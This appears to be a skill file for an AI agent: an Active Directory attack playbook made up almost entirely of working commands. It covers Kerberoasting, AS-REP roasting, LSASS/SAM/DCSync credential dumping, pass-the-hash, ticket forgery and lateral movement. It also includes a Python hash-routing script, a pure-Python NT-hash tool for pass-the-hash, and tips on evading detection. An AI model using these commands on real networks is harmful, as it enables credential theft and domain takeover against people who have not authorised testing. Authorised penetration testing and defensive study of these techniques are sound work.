skills/active-directory-attacks/SKILL.md
Attack and enumerate Active Directory environments using Kerberos attacks (Kerberoasting, ASREPRoasting), credential dumping (DCSync, Mimikatz), lateral movement (PtH, PtT), and BloodHound analysis. Use when pentesting Windows domains or exploiting AD misconfigurations.
Kerberoasting:
Windows:
# Check kerberoastable users
.\Rubeus.exe kerberoast /stats
# Roast all
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Target specific user
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt
# Target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap
Linux:
# Impacket GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password -outputfile hashes.txt
# With NT hash
GetUserSPNs.py -request -dc-ip 10.10.10.10 -hashes :ntlmhash domain.local/user -outputfile hashes.txt
# Target specific user
GetUserSPNs.py -request-user svc_mssql -dc-ip 10.10.10.10 domain.local/user:password
Crack Hashes:
# hashcat: mode 13100 is TGS-REP etype 23 (RC4-HMAC), the cheap case
hashcat -m 13100 hashes.txt wordlist.txt
# AES-only accounts (etype 17/18) need -m 19600 / 19700 and crack far slower; work the RC4 hashes first
# John
john --format=krb5tgs --wordlist=wordlist.txt hashes.txt
AS-REP Roasting:
Windows:
# Enumerate vulnerable users
Get-DomainUser -PreauthNotRequired
# Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
.\Rubeus.exe asreproast /user:victim /format:hashcat
Linux:
# With domain creds
GetNPUsers.py domain.local/user:password -request -format hashcat -outputfile hashes.txt
# Without creds (username list)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.10
Crack AS-REP:
# 18200 is AS-REP etype 23 (RC4); only accounts with "Do not require Kerberos preauthentication" set are roastable
hashcat -m 18200 hashes.txt wordlist.txt
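Rubeus and Impacket write every roasted ticket into one file, but hashcat takes one mode per run and a mixed file of RC4 and AES hashes fails to load. The script below is an added example, not part of this skill or of Rubeus/Impacket: it recognises the Kerberoast and AS-REP line layouts those tools emit, drops duplicate hashes for the same account (one SPN is enough to crack a password), and buckets the rest into one file per hashcat mode. The sample hashes are constructed with placeholder checksum/ciphertext hex and will not crack; only the line layout is real.

```python
import re
import sys
from pathlib import Path

# hashcat mode per (hash family, Kerberos etype). RC4 (etype 23) is the cheap
# case; AES tickets crack orders of magnitude slower and need their own modes.
HASHCAT_MODES = {
    ("krb5tgs", 23): 13100,    # Kerberoast, RC4-HMAC
    ("krb5tgs", 17): 19600,    # Kerberoast, AES128-CTS-HMAC-SHA1-96
    ("krb5tgs", 18): 19700,    # Kerberoast, AES256-CTS-HMAC-SHA1-96
    ("krb5asrep", 23): 18200,  # AS-REP roast, RC4-HMAC
}

# Line layouts as emitted by Rubeus and Impacket (GetUserSPNs.py / GetNPUsers.py).
_PATTERNS = (
    # $krb5tgs$23$*user$REALM$spn*$<16-byte checksum>$<encrypted data>
    ("krb5tgs", re.compile(
        r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
        r"\$(?P<cksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$", re.I)),
    # $krb5tgs$17|18$user$REALM$*spn*$<12-byte checksum>$<encrypted data>
    ("krb5tgs", re.compile(
        r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<spn>[^*]+)\*"
        r"\$(?P<cksum>[0-9a-f]{24})\$(?P<edata>[0-9a-f]+)$", re.I)),
    # $krb5asrep$23$user@REALM:<16-byte checksum>$<encrypted data>
    ("krb5asrep", re.compile(
        r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
        r"(?P<cksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$", re.I)),
)


def parse_hash(line):
    """Return (family, etype, user, realm) for a recognised hash line, else None."""
    for family, pattern in _PATTERNS:
        m = pattern.match(line)
        if m:
            return family, int(m.group("etype")), m.group("user"), m.group("realm")
    return None


def route(lines):
    """Bucket hash lines by hashcat mode.

    Returns (by_mode, rejected). Each account is kept once per family/etype:
    an account with several SPNs yields several TGS hashes, but one is enough
    to recover the password, and the extra copies only burn cracking time.
    """
    by_mode, rejected, seen = {}, [], set()
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        parsed = parse_hash(line)
        if parsed is None:
            rejected.append((line, "unrecognised or truncated hash line"))
            continue
        family, etype, user, realm = parsed
        mode = HASHCAT_MODES.get((family, etype))
        if mode is None:
            rejected.append((line, f"no hashcat mode mapped for {family} etype {etype}"))
            continue
        key = (family, etype, user.lower(), realm.lower())
        if key in seen:
            continue
        seen.add(key)
        by_mode.setdefault(mode, []).append(line)
    return by_mode, rejected


# Constructed sample: checksum/edata are placeholder hex, far shorter than real tickets.
SAMPLE_LINES = [
    "$krb5tgs$23$*svc_mssql$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local:1433*$" + "a" * 32 + "$" + "b" * 64,
    "$krb5tgs$23$*svc_mssql$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local*$" + "a" * 32 + "$" + "b" * 64,
    "$krb5tgs$18$svc_http$DOMAIN.LOCAL$*HTTP/web01.domain.local*$" + "c" * 24 + "$" + "d" * 64,
    "$krb5asrep$23$victim@DOMAIN.LOCAL:" + "e" * 32 + "$" + "f" * 64,
    "$krb5tgs$23$*truncated$DOMAIN.LOCAL$cifs/host.domain.local*$abcd",
]


def write_mode_files(lines, outdir="."):
    """Write one hashes_<mode>.txt per hashcat mode and return {mode: path}."""
    by_mode, rejected = route(lines)
    paths = {}
    for mode, hashes in sorted(by_mode.items()):
        path = Path(outdir) / f"hashes_{mode}.txt"
        path.write_text("\n".join(hashes) + "\n")
        paths[mode] = path
        print(f"hashcat -m {mode} {path} wordlist.txt   # {len(hashes)} hash(es)")
    for line, why in rejected:
        print(f"skipped: {why}: {line[:40]}...", file=sys.stderr)
    return paths


if __name__ == "__main__":
    src = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_LINES
    write_mode_files(src)
```

Run it with the Rubeus or GetUserSPNs output file as the argument; with no argument it routes the constructed sample. Rubeus output should be produced with /nowrap so each hash stays on one line.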
BloodHound:
Data Collection:
# Windows - SharpHound
.\SharpHound.exe -c All --zipfilename output.zip
.\SharpHound.exe -c All,GPOLocalGroup
Linux:
# bloodhound-python
bloodhound-python -u user -p password -ns 10.10.10.10 -d domain.local -c All --zip
Useful Queries:
# Shortest path to Domain Admins
MATCH p=shortestPath((n)-[*1..]->(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p
# Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u
# AS-REP Roastable
MATCH (u:User {dontreqpreauth:true}) RETURN u
# Unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
# DCSync rights
MATCH p=(n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p
Credential Dumping:
LSASS Dumping:
# All three need local admin with SeDebugPrivilege; procdump and comsvcs.dll against lsass are well-known EDR detections
# Task Manager: Right-click lsass.exe -> Create dump file
# procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
# Parse offline with mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
SAM Dumping:
# Save hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
# Extract hashes (Linux)
secretsdump.py -sam sam.hive -system system.hive LOCAL
DCSync (Domain):
# Needs Replicating Directory Changes + Replicating Directory Changes All on the domain object (Domain Admins, DCs, and whatever BloodHound's DCSync edge shows); each replication request logs a 4662 on the DC
# secretsdump - dump all
secretsdump.py domain.local/user:password@10.10.10.10 -just-dc
# Specific user
secretsdump.py domain.local/user:password@10.10.10.10 -just-dc-user krbtgt
# With NTLM hash
secretsdump.py -hashes :ntlmhash domain.local/user@10.10.10.10 -just-dc
# -just-dc-ntlm skips the Kerberos keys if only NT hashes are wanted
Pass-the-Hash:
Windows:
# Mimikatz (needs local admin; the spawned cmd.exe authenticates over the network with the supplied NT hash)
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe
Linux:
# CrackMapExec (-H takes the NT hash alone; "Pwn3d!" in the output means the account is local admin)
crackmapexec smb 10.10.10.10 -u administrator -H hash
crackmapexec smb 10.10.10.10 -u administrator -H hash -x whoami
# psexec
psexec.py -hashes :hash administrator@10.10.10.10
# wmiexec
wmiexec.py -hashes :hash administrator@10.10.10.10
# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -H hash
# Local accounts other than RID 500 are refused remote admin access unless LocalAccountTokenFilterPolicy=1; use a domain account or the built-in Administrator
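Every -hashes / -H argument above is the NT hash, which is MD4 over the UTF-16LE password with no salt; the LM half is the constant hash of an empty password because LM storage is disabled on any current domain. The code below is an added example, not part of this skill or of Impacket or Mimikatz: it implements MD4 in pure Python (OpenSSL 3 builds of hashlib commonly refuse MD4 as a legacy algorithm), derives the NT hash, builds the exact LM:NT string Impacket expects, and checks a cracked or guessed password against a dumped hash without touching the target.

```python
import struct

_MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": the LM half of -hashes on modern domains


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def _f(x, y, z):
    return (x & y) | ((~x & _MASK) & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# (boolean function, message-word order, shift schedule, additive constant) per MD4 round
_ROUNDS = (
    (_f, tuple(range(16)), (3, 7, 11, 19), 0x00000000),
    (_g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
    (_h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
)


def md4(data: bytes) -> str:
    """MD4 (RFC 1320) as lower-case hex, pure Python."""
    msg = bytearray(data)
    msg.append(0x80)                       # padding: 0x80, zeros to 56 mod 64, then 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, order, shifts, k in _ROUNDS:
            for i, word in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[word] + k) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c    # rotate registers so the next step updates the old d
        h = [(v + w) & _MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h).hex()


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password, unsalted."""
    return md4(password.encode("utf-16-le"))


def impacket_hashes_arg(password: str) -> str:
    """Value for Impacket's -hashes LM:NT; CrackMapExec's -H takes only the NT half."""
    return f"{EMPTY_LM}:{nt_hash(password)}"


def matches_dump(password: str, dumped_nt: str) -> bool:
    """Offline check of a candidate password against an NT hash from secretsdump or the SAM."""
    return nt_hash(password) == dumped_nt.lower()


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password"))
    print("-hashes", impacket_hashes_arg("password"))
```

Because the hash is unsalted, any two accounts with the same NT hash share a password, which is why the same hash string turns up across hosts in a SAM/DCSync dump and why PtH works at all.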
Pass-the-Ticket:
Export Tickets:
# Mimikatz
sekurlsa::tickets /export
# Rubeus
.\Rubeus.exe dump /nowrap
.\Rubeus.exe monitor /interval:10
Import/Use Tickets:
# Mimikatz
kerberos::ptt ticket.kirbi
# Rubeus
.\Rubeus.exe ptt /ticket:base64ticket
# Verify
klist
Linux PtT:
# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache
# Set ticket
export KRB5CCNAME=ticket.ccache
# Use ticket (-k reads KRB5CCNAME; Kerberos needs the target's hostname, not its IP)
psexec.py -k -no-pass domain.local/administrator@dc.domain.local
Overpass-the-Hash (Pass-the-Key):
# Rubeus - request TGT with NTLM hash
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /rc4:hash /ptt
# With AES key (better OPSEC: an RC4 TGT request shows etype 0x17 in event 4768, which stands out where AES is the domain default)
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /aes256:key /ptt
Golden Ticket (TGT):
# Requirements: krbtgt hash, Domain SID (the S-1-5-21-... prefix of any domain account's SID)
# Forged TGT signed with the krbtgt key; stays valid until krbtgt has been reset twice
# Mimikatz
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt
# Rubeus
.\Rubeus.exe golden /rc4:hash /user:administrator /domain:domain.local /sid:S-1-5-21-... /ptt
# Prefer the krbtgt AES256 key (/aes256:key in both tools) over RC4; RC4 tickets are an easy detection where AES is the norm
Silver Ticket (TGS):
# Requirements: Service account hash (for host services such as CIFS this is the computer account's hash), Service SPN, Domain SID
# Forged service ticket presented straight to the service; the DC is never contacted, so no 4769 is logged there
# Mimikatz - CIFS service
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:dc.domain.local /service:cifs /rc4:hash /ptt
Lateral Movement:
CrackMapExec:
# SMB spray
crackmapexec smb 10.10.10.0/24 -u user -p password
# Execute commands
crackmapexec smb 10.10.10.10 -u admin -p password -x whoami
crackmapexec smb 10.10.10.10 -u admin -H hash -x whoami
# Dump SAM
crackmapexec smb 10.10.10.10 -u admin -p password --sam
# Dump LSA
crackmapexec smb 10.10.10.10 -u admin -p password --lsa
PSExec Variants:
# psexec (uploads a service binary to ADMIN$ and creates a service: noisy, leaves 7045 service-install events)
psexec.py domain/user:password@10.10.10.10
# wmiexec (no service and no dropped binary; runs via WMI, output read back through ADMIN$)
wmiexec.py domain/user:password@10.10.10.10
# smbexec (no binary dropped, but still creates a short-lived service per command)
smbexec.py domain/user:password@10.10.10.10
WinRM:
# PowerShell
Enter-PSSession -ComputerName dc.domain.local -Credential domain\user
# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -p password
evil-winrm -i 10.10.10.10 -u administrator -H hash
Enumeration:
Domain Info:
# PowerView
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainComputer
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"
Linux Enumeration:
# crackmapexec
crackmapexec smb 10.10.10.0/24 -u user -p password --users
crackmapexec smb 10.10.10.0/24 -u user -p password --groups
# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -D 'user@domain.local' -w 'password' -b "DC=domain,DC=local"